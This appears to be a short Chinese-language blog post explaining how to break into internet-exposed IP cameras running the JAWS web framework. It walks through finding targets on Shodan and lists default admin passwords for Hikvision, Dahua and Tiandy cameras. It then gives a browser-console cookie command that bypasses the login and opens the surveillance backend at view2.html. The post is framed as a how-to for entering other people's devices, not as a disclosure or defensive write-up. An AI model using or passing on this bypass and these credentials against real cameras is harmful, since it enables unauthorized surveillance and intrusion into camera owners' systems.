shodan.io 上面搜索JAWS
就能找到很多使用了JAWS服務框架的IPCAM



隨便打開幾個,就可以看到監視器的login界面


不用任何操作,直接點擊登錄,就能進入管理後台



(1)海康威視IP網絡攝像機:超級用戶:admin,超級用戶密碼:12345
(2)大華網絡攝像機:用戶名:admin,密碼:888888
(3)天地偉業網絡攝像機:用戶名:Admin,密碼:111111

---
即使改了用戶名密碼又如何呢?
沒有用戶名密碼都可以login!

在管理界面的js裡面,可以看到這樣一段原始碼


從cookie裡面取出用戶名和密碼,只要不為空就允許登錄!
真是神邏輯!
就因為這個神邏輯 所以破解方法非常簡單

Chrome / Friefox 按下F12
進入開發者工具  在console裡面輸入
setCookie30Days('dvr_usr', 'haha');setCookie30Days('dvr_pwd', 'haha'); 

就可以設置這兩個cookie,
然後直接在網址後面加上view2.html,就能進入監控後台了






0 意見:

張貼留言

LinkWithin

Related Posts with Thumbnails
top